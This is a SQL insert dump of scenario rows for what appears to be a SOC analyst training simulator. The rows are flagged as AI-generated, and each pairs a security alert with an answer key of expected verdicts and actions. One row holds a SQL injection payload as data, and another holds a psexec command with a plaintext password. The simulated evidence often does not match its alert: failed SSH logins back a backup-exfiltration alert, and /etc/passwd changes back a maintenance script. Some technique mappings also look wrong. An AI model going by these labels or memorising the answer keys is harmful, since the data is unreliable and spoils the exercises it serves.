(1818, 'Routine IT Vulnerability Scanning Detected as Brute Force Attack', 'medium', 'Splunk', 'A series of login failures from an internal IP address were detected, resembling a brute force attack. Upon investigation, these attempts align with routine vulnerability scanning conducted by IT.', 'Brute Force', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:25:43Z\",\"event_type\":\"login_failure\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"192.168.1.25\",\"username\":\"admin\",\"hostname\":\"server1\",\"failed_attempts\":20}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP used for scheduled vulnerability scans\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal server targeted for scanning\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The source IP is an internal address used by IT for routine vulnerability scanning, not an actual brute force attack.\"}', 'Intermediate', 'SIEM', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.352Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T10:25:43Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server1\\\",\\\"failed_attempts\\\":20}\"},{\"timestamp\":\"2026-03-16T03:04:28.352Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T10:25:43Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server1\\\",\\\"failed_attempts\\\":20}\"},{\"timestamp\":\"2026-03-16T03:03:28.352Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T10:25:43Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server1\\\",\\\"failed_attempts\\\":20}\"},{\"timestamp\":\"2026-03-16T03:02:28.352Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T10:25:43Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server1\\\",\\\"failed_attempts\\\":20}\"},{\"timestamp\":\"2026-03-16T03:01:28.352Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T10:25:43Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server1\\\",\\\"failed_attempts\\\":20}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1819, 'Authorized Administrative Backup Misidentified as Data Exfiltration', 'high', 'Azure Sentinel', 'Large data transfer from a sensitive file server to an external IP address detected. This is part of an authorized backup process to a cloud storage service.', 'Data Exfil', 'T1020', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:27Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.10\",\"dst_ip\":\"203.0.113.50\",\"hostname\":\"backup-server\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP assigned to backup server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"IP associated with a trusted cloud storage service\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Common hash for an empty file\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The data transfer was part of a scheduled backup to a verified cloud service, not unauthorized exfiltration.\"}', 'Intermediate', 'SIEM', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.352Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:45:27Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.10\\\",\\\"dst_ip\\\":\\\"203.0.113.50\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.352Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:45:27Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.10\\\",\\\"dst_ip\\\":\\\"203.0.113.50\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.352Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:45:27Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.10\\\",\\\"dst_ip\\\":\\\"203.0.113.50\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.352Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:45:27Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.10\\\",\\\"dst_ip\\\":\\\"203.0.113.50\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.352Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:45:27Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.10\\\",\\\"dst_ip\\\":\\\"203.0.113.50\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1820, 'Misconfigured Legacy Application Triggering Command Execution Alert', 'medium', 'Wazuh', 'A command execution event was identified on a legacy server, initially flagged as suspicious. This corresponds to a scheduled task for system maintenance.', 'Execution', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:15:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"hostname\":\"legacy-app-server\",\"command_line\":\"/usr/bin/python3 /opt/scripts/maintenance.py\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of the legacy application server\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"/usr/bin/python3 /opt/scripts/maintenance.py\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Routine maintenance script executed as per schedule\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The command execution is part of a scheduled maintenance task and not indicative of malicious activity.\"}', 'Intermediate', 'SIEM', 5, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.353Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:15:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"hostname\\\":\\\"legacy-app-server\\\",\\\"command_line\\\":\\\"/usr/bin/python3 /opt/scripts/maintenance.py\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.353Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:15:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"hostname\\\":\\\"legacy-app-server\\\",\\\"command_line\\\":\\\"/usr/bin/python3 /opt/scripts/maintenance.py\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.353Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:15:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"hostname\\\":\\\"legacy-app-server\\\",\\\"command_line\\\":\\\"/usr/bin/python3 /opt/scripts/maintenance.py\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.353Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:15:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"hostname\\\":\\\"legacy-app-server\\\",\\\"command_line\\\":\\\"/usr/bin/python3 /opt/scripts/maintenance.py\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.353Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:15:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"hostname\\\":\\\"legacy-app-server\\\",\\\"command_line\\\":\\\"/usr/bin/python3 /opt/scripts/maintenance.py\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1821, 'Benign System Health Check Detected as Lateral Movement', 'low', 'Elastic SIEM', 'A series of network connections between internal systems were detected, resembling lateral movement. These are part of a routine system health check script.', 'Lateral Movement', 'T1077', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.10.5\",\"dst_ip\":\"192.168.10.20\",\"hostname\":\"monitoring-server\",\"command_line\":\"check_system_health.sh\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.10.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of monitoring server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.10.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of the system being checked\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"check_system_health.sh\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Routine system health check script execution\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"These connections are part of routine health checks and not indicative of unauthorized lateral movement.\"}', 'Intermediate', 'SIEM', 5, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.354Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T12:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.10.5\\\",\\\"dst_ip\\\":\\\"192.168.10.20\\\",\\\"hostname\\\":\\\"monitoring-server\\\",\\\"command_line\\\":\\\"check_system_health.sh\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.354Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T12:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.10.5\\\",\\\"dst_ip\\\":\\\"192.168.10.20\\\",\\\"hostname\\\":\\\"monitoring-server\\\",\\\"command_line\\\":\\\"check_system_health.sh\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.354Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T12:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.10.5\\\",\\\"dst_ip\\\":\\\"192.168.10.20\\\",\\\"hostname\\\":\\\"monitoring-server\\\",\\\"command_line\\\":\\\"check_system_health.sh\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.354Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T12:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.10.5\\\",\\\"dst_ip\\\":\\\"192.168.10.20\\\",\\\"hostname\\\":\\\"monitoring-server\\\",\\\"command_line\\\":\\\"check_system_health.sh\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.354Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T12:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.10.5\\\",\\\"dst_ip\\\":\\\"192.168.10.20\\\",\\\"hostname\\\":\\\"monitoring-server\\\",\\\"command_line\\\":\\\"check_system_health.sh\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1822, 'Network Monitoring Tool Triggering Phishing Alert', 'medium', 'Splunk', 'Traffic from a network monitoring tool was detected, initially flagged as phishing due to its unusual activity patterns. Further review confirms it as legitimate monitoring traffic.', 'Phishing', 'T1204', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:00:12Z\",\"event_type\":\"web_request\",\"src_ip\":\"192.168.3.20\",\"dst_ip\":\"198.51.100.10\",\"hostname\":\"network-mon\",\"url\":\"http://trusted.monitoring.com/status\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.3.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of network monitoring server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"IP associated with a trusted network monitoring service\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://trusted.monitoring.com/status\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"URL is part of a legitimate network monitoring tool\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The network traffic was generated by a legitimate monitoring tool and not indicative of a phishing attempt.\"}', 'Intermediate', 'SIEM', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.355Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:00:12Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"hostname\\\":\\\"network-mon\\\",\\\"url\\\":\\\"http://trusted.monitoring.com/status\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.355Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:00:12Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"hostname\\\":\\\"network-mon\\\",\\\"url\\\":\\\"http://trusted.monitoring.com/status\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.355Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:00:12Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"hostname\\\":\\\"network-mon\\\",\\\"url\\\":\\\"http://trusted.monitoring.com/status\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.355Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:00:12Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"hostname\\\":\\\"network-mon\\\",\\\"url\\\":\\\"http://trusted.monitoring.com/status\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.355Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:00:12Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"hostname\\\":\\\"network-mon\\\",\\\"url\\\":\\\"http://trusted.monitoring.com/status\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1823, 'Suspicious Process Execution Detected', 'low', 'Splunk', 'A routine system health check triggered a process execution alert. The command used is commonly associated with administrative tasks.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:15:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"10.0.0.10\",\"username\":\"admin_user\",\"hostname\":\"server01\",\"command_line\":\"psexec \\\\\\\\10.0.0.10 -u admin -p password123\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for administrative management.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"psexec \\\\\\\\10.0.0.10 -u admin -p password123\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command used for authorized administrative tasks.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The command line activity is consistent with routine administrative tasks.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(1824, 'Failed Login Attempts from Foreign IP', 'medium', 'Azure Sentinel', 'Multiple failed login attempts detected from an IP associated with a routine vulnerability scanning service.', 'Credential Attack', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:45:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"10.0.0.2\",\"username\":\"user_test\",\"hostname\":\"workstation01\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported as part of legitimate vulnerability scanning services.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The source IP is known for legitimate scanning activities.\"}', 'Beginner', 'SIEM', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1825, 'Routine Web Request with Suspicious Payload', 'medium', 'Wazuh', 'A web request containing an SQL-like payload was detected, originating from an internal monitoring tool.', 'Web Attack', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:20:10Z\",\"event_type\":\"web_request\",\"src_ip\":\"10.0.1.2\",\"dst_ip\":\"192.168.1.100\",\"hostname\":\"webserver01\",\"request_body\":\"\' OR \'1\'=\'1\' --\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.1.2\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"internal\",\"details\":\"Internal IP address related to monitoring.\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Payload part of routine testing by internal tools.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The payload is part of internal testing by authorized personnel.\"}', 'Beginner', 'SIEM', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1826, 'Unauthorized SSH Login Attempt', 'high', 'Elastic SIEM', 'An unauthorized SSH login attempt was detected from an external IP address.', 'Brute Force', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:00:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.0.0.8\",\"username\":\"root\",\"hostname\":\"server02\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks.\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The external IP is associated with known malicious activity.\"}', 'Beginner', 'SIEM', 3, 1, 'ENERGY', NULL, NULL, NULL, 0),
(1827, 'Benign Email Containing Potentially Malicious URL', 'medium', 'Proofpoint', 'An email was flagged for containing a URL typically seen in phishing attempts, but it belongs to a trusted partner.', 'Phishing', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:30:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"192.0.2.55\",\"dst_ip\":\"192.168.1.50\",\"email_sender\":\"partner@example.com\",\"url\":\"http://trustedpartner.com/login\"}', '2026-03-16 03:07:21', '2026-03-16 03:07:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"partner@example.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Email belongs to a known trusted partner.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://trustedpartner.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"clean\",\"details\":\"URL verified as safe and belongs to a trusted domain.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The URL and sender are verified as legitimate and trusted.\"}', 'Beginner', 'SIEM', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
